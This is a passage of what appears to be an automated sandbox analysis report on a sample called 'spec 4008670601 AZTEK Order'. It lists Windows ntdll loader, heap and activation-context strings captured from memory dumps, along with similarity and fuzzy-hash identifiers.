                                                      • VerifierFlags, xrefs: 01828C50
                                                      • AVRF: -*- final list of providers -*- , xrefs: 01828B8F
                                                      • VerifierDebug, xrefs: 01828CA5
                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01828A67
                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01828A3D
                                                      • HandleTraces, xrefs: 01828C8F
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                      • API String ID: 0-3223716464
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                      • API String ID: 0-1109411897
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-792281065
                                                      Strings
                                                      • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 017F99ED
                                                      • Getting the shim user exports failed with status 0x%08lx, xrefs: 017F9A01
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 017F9A11, 017F9A3A
                                                      • LdrpInitShimEngine, xrefs: 017F99F4, 017F9A07, 017F9A30
                                                      • apphelp.dll, xrefs: 01796496
                                                      • Loading the shim user DLL failed with status 0x%08lx, xrefs: 017F9A2A
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-204845295
                                                      Strings
                                                      • SXS: %s() passed the empty activation context, xrefs: 01812165
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01812180
                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0181219F
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01812178
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018121BF
                                                      • RtlGetAssemblyStorageRoot, xrefs: 01812160, 0181219A, 018121BA
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                      • API String ID: 0-861424205
                                                      Strings
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01818181, 018181F5
                                                      • LdrpInitializeProcess, xrefs: 017DC6C4
                                                      • LdrpInitializeImportRedirection, xrefs: 01818177, 018181EB
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 017DC6C3
                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 018181E5
                                                      • Loading import redirection DLL: '%wZ', xrefs: 01818170
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                      • API String ID: 0-475462383
                                                      APIs
                                                        • Part of subcall function 017E2DF0: LdrInitializeThunk.NTDLL ref: 017E2DFA
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BA3
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BB6
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D60
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D74
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                      • String ID:
                                                      • API String ID: 1404860816-0
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                      • API String ID: 0-379654539
                                                      Strings
                                                      • LdrpInitializeProcess, xrefs: 017D8422
                                                      • @, xrefs: 017D8591
                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017D855E
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 017D8421
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1918872054
                                                      Strings
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018122B6
                                                      • SXS: %s() passed the empty activation context, xrefs: 018121DE
                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018121D9, 018122B1
                                                      • .Local, xrefs: 017D28D8
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                      • API String ID: 0-1239276146
                                                      Strings
                                                      • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01813437
                                                      • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01813456
                                                      • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0181342A
                                                      • RtlDeactivateActivationContext, xrefs: 01813425, 01813432, 01813451
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                      • API String ID: 0-1245972979
                                                      Strings
                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018010AE
                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0180106B
                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01800FE5
                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01801028
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                      • API String ID: 0-1468400865
                                                      Strings
                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0180A992
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0180A9A2
                                                      • LdrpDynamicShimModule, xrefs: 0180A998
                                                      • apphelp.dll, xrefs: 017C2462
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-176724104
                                                      Strings
                                                      • HEAP[%wZ]: , xrefs: 017B3255
                                                      • HEAP: , xrefs: 017B3264
                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017B327D
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                      • API String ID: 0-617086771
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-4253913091
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $@
                                                      • API String ID: 0-1077428164
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                      • API String ID: 0-2779062949
                                                      Strings
                                                      • LdrpCheckModule, xrefs: 0180A117
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0180A121
                                                      • Failed to allocated memory for shimmed module list, xrefs: 0180A10F
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-161242083
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-1334570610
                                                      Strings
                                                      • Failed to reallocate the system dirs string !, xrefs: 018182D7
                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 018182DE
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 018182E8
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1783798831
                                                      Strings
                                                      • PreferredUILanguages, xrefs: 0185C212
                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0185C1C5
                                                      • @, xrefs: 0185C1F1
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                      • API String ID: 0-2968386058
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                      • API String ID: 0-1373925480
                                                      Strings
                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01824888
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01824899
                                                      • LdrpCheckRedirection, xrefs: 0182488F
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                      • API String ID: 0-3154609507
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-2558761708
                                                      Strings
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01822104
                                                      • Process initialization failed with status 0x%08lx, xrefs: 018220F3
                                                      • LdrpInitializationFailure, xrefs: 018220FA
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2986994758
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: #%u
                                                      • API String ID: 48624451-232158463
                                                      Strings
                                                      • LdrResSearchResource Enter, xrefs: 017AAA13
                                                      • LdrResSearchResource Exit, xrefs: 017AAA25
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                      • API String ID: 0-4066393604
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `$`
                                                      • API String ID: 0-197956300
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      • API String ID: 2994545307-634100481
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$MUI
                                                      • API String ID: 0-17815947
                                                      Strings
                                                      • kLsE, xrefs: 017A0540
                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 017A063D
                                                      Similarity
                                                      • API ID:
                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                      • API String ID: 0-2547482624
                                                      Strings
                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 017AA2FB
                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 017AA309
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                      • API String ID: 0-2876891731
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Cleanup Group$Threadpool!
                                                      • API String ID: 2994545307-4008356553
                                                      Similarity
                                                      • API ID:
                                                      • String ID: MUI
                                                      • API String ID: 0-1339004836
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GlobalTags
                                                      • API String ID: 0-1106856819
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .mui
                                                      • API String ID: 0-1199573805
                                                      Similarity
                                                      • API ID:
                                                      • String ID: EXT-
                                                      • API String ID: 0-1948896318
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryHash
                                                      • API String ID: 0-2202222882
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #
                                                      • API String ID: 0-1885708031
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryName
                                                      • API String ID: 0-215506332
                                                      Strings
                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0182895E
                                                      Similarity
                                                      • API ID:
                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                      • API String ID: 0-702105204
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3b574da113ea673e2b9ac4f3c61f63d8a0385dc1a01fb2fc3d74677dc44e079
                                                      • Instruction ID: 0daf9a6aebe6519eed4b9684641d584cd4ac8d73426f51147c1a9e4e02c0daa9
                                                      • Opcode Fuzzy Hash: a3b574da113ea673e2b9ac4f3c61f63d8a0385dc1a01fb2fc3d74677dc44e079
                                                      • Instruction Fuzzy Hash: 7222C2742446698BEB2DCF2DC094376BBF1AF44304F08845AE997CF286EB35D652DB60
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: baa9ad21d76d6c89cdb78ccefbadce082d659669b9e33d8b504f80faee97a182
                                                      • Instruction ID: 8b6faa3d61cb7bffe2f6e5ec16c2f13c35559ed388bc409c25cd5c6fd987c9db
                                                      • Opcode Fuzzy Hash: baa9ad21d76d6c89cdb78ccefbadce082d659669b9e33d8b504f80faee97a182
                                                      • Instruction Fuzzy Hash: DC32AE71A01209CFDB25CF68C884AAAF7F1FF88310F684669E955EB391D734E941CB90
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                      • Instruction ID: 97e43d292e6b0621cb476774175645ac0d2f51d18b30d3f75c71de6a4729ec2c
                                                      • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                      • Instruction Fuzzy Hash: 43F17074E0020A9BDB25DF99C994BAEFBF5AF48B10F04812DE902EB354E734E941CB50
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 32174964f5590d01edb3cf1182ce176718a0c86978e9e50f685176539e8d65c4
                                                      • Instruction ID: 74cefc0a1422cf707b425ee100eae59c8c003b51e157a5df0008ddafd1b190b4
                                                      • Opcode Fuzzy Hash: 32174964f5590d01edb3cf1182ce176718a0c86978e9e50f685176539e8d65c4
                                                      • Instruction Fuzzy Hash: 2DD1D471A0060A9BDF15CF69C841AFEB7F1AFC9304F1C8269E955E7241D735EA068B90
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 081e3b8a41a8db37bb6f3994ea76089ec447e29a2b4dbc439a899333f7c81b0b
                                                      • Instruction ID: 6a6d744c21ac7b3df6a6dc737763c1590856ba30b3d24ee5f0211c8b63ce3225
                                                      • Opcode Fuzzy Hash: 081e3b8a41a8db37bb6f3994ea76089ec447e29a2b4dbc439a899333f7c81b0b
                                                      • Instruction Fuzzy Hash: 6DE17871608342CFC715CF28C494A6AFBE0BF89314F598A6DF99987351EB31E905CB92
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2d3655cfb39035bed7948cc9f5e30e95b3338b4f629fc40df7f6dd27da2404fd
                                                      • Instruction ID: 5f7b8f96c74019fefedfac4daa078a9291025d66b48c0851f4ae4f75437d74e4
                                                      • Opcode Fuzzy Hash: 2d3655cfb39035bed7948cc9f5e30e95b3338b4f629fc40df7f6dd27da2404fd
                                                      • Instruction Fuzzy Hash: A3D1EF71A0020A9BDF14CF68D880ABFF7B5BF55304F14426DEA12DB290EB34E958CB61
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                      • Instruction ID: 3168b28e44b09dbc41e0bd281fe915e0e8d035ce6f4c49b9db724e5c1f7b6eb1
                                                      • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                      • Instruction Fuzzy Hash: EBB1A274A00619AFDF26DB98C940AABBBF5FF86304F14445DEA02D7790DB74EA85CB10
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                      • Instruction ID: f5fb7a2338aa8ba4a22fd2ea885475944e8e4d4adc594f179a227b4f7945ba95
                                                      • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                      • Instruction Fuzzy Hash: 78B1D73160064AAFDB26DB68C894BBFFBF6AF44304F144599E652D7285DB30DE41CB50
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7808c39098aeb65b6a082eaafce0b9571fd1745242b2d7b0bf731a3f393630ec
                                                      • Instruction ID: 365c54488afc685f2bcca24b2f5e6cb622264f015d7614d835aad79984610b2d
                                                      • Opcode Fuzzy Hash: 7808c39098aeb65b6a082eaafce0b9571fd1745242b2d7b0bf731a3f393630ec
                                                      • Instruction Fuzzy Hash: 90C159742083458FE764CF19C498BABF7E5BF88304F54496DE98987291E774EA08CF92
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7a2548d46527ea8b3c9f213ff967a20b40c85a7f2cff461934ff1fd53b4892be
                                                      • Instruction ID: ba244a815379440cc9020d5ba61e917d475edac33734b83dd28a432619332f1a
                                                      • Opcode Fuzzy Hash: 7a2548d46527ea8b3c9f213ff967a20b40c85a7f2cff461934ff1fd53b4892be
                                                      • Instruction Fuzzy Hash: 85B17170A002668BDF65CF68D890BA9F7F5EF44700F1485E9D50AE7385EB309E89CB21
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 557272b72b8bd273bc2d8442a10f694bbd79df09c099395504464a6bdc80beff
                                                      • Instruction ID: 27daead4cbb9c3ef54b4ccc603e27d66b150ea4d87c7334cbaebaf07434c1165
                                                      • Opcode Fuzzy Hash: 557272b72b8bd273bc2d8442a10f694bbd79df09c099395504464a6bdc80beff
                                                      • Instruction Fuzzy Hash: 33A1E531E006599FEB32DB58CC48BADFFA4AB05B14F154169EB01EB2D1DB749E40CB91
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c74b10f6d7590026fbf718a0f8d62f3f7f3a7c9743762ed1255a68f5100ee4ba
                                                      • Instruction ID: 2e252fe47a24401ddc723786c5b2cb5dc243eb77ab5f307ff7ff5473ce3ca69b
                                                      • Opcode Fuzzy Hash: c74b10f6d7590026fbf718a0f8d62f3f7f3a7c9743762ed1255a68f5100ee4ba
                                                      • Instruction Fuzzy Hash: 97A10271B006169FDB24CF69C998BAAF7F5FF49318F104029EA05E7285DBB4E911CB50
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cc8ee911b3e2cc4f6747877d4430d1d61cc0e5b6003a96554c42d297e710cc29
                                                      • Instruction ID: 3b3051312ee83dfd7087bcb1ca103fbc3e4201780476233368473b3c88b756ec
                                                      • Opcode Fuzzy Hash: cc8ee911b3e2cc4f6747877d4430d1d61cc0e5b6003a96554c42d297e710cc29
                                                      • Instruction Fuzzy Hash: 7AA1EC72A04216EFC722DF28C984B6ABBE9FF48744F150928F589DB655D334EE40CB91
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                      • Instruction ID: c3aad9f807a60214cae9ba64279f6c45e1ebcf2fe6dc3db938b40e921ea4912a
                                                      • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                      • Instruction Fuzzy Hash: C0B12771E0061ADFDB25CFA9C880AADBBB6BF88314F148129E914E7355D730EA41CB90
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 752d2f2a00487b10d37b52e63be5438ca3721ef14497c8ce777c0887e0e16d83
                                                      • Instruction ID: e2fc196847533b233ca84e1feb3102de72cb428188739bbb4262b9ea311b8977
                                                      • Opcode Fuzzy Hash: 752d2f2a00487b10d37b52e63be5438ca3721ef14497c8ce777c0887e0e16d83
                                                      • Instruction Fuzzy Hash: C0918871D00125AFDB16CF58D884BAEBFB5EF49710F254159EA10EB345E734EE409BA0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ff5ceb06f6376dc51b350d77c21b205f2b7b83d050fafd2459291d5db7aed077
                                                      • Instruction ID: d347fb7dd2dd8eec16ea0a121ba7dc8e71ccc60dc2e8c91305d7b66f8cd8d252
                                                      • Opcode Fuzzy Hash: ff5ceb06f6376dc51b350d77c21b205f2b7b83d050fafd2459291d5db7aed077
                                                      • Instruction Fuzzy Hash: C7912531A00616CBDB259B58C8C4BF9FBA1EF84714F2540A9F905DB386FB38DA41C791
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 90f72882f50ad7940af559e68bd0f55e1dedf7a8b0504fd43787e1f568e42a6d
                                                      • Instruction ID: b10ee2e88ea09f28ed10910c084c207982b23d41a7edb48dc2a3d5b2f47a1875
                                                      • Opcode Fuzzy Hash: 90f72882f50ad7940af559e68bd0f55e1dedf7a8b0504fd43787e1f568e42a6d
                                                      • Instruction Fuzzy Hash: 9B815E71A0061A9BDB24CF69C944ABFFBF9FB48700F14852EE555D7641E334E940CBA4
                                                      Memory Dump Source
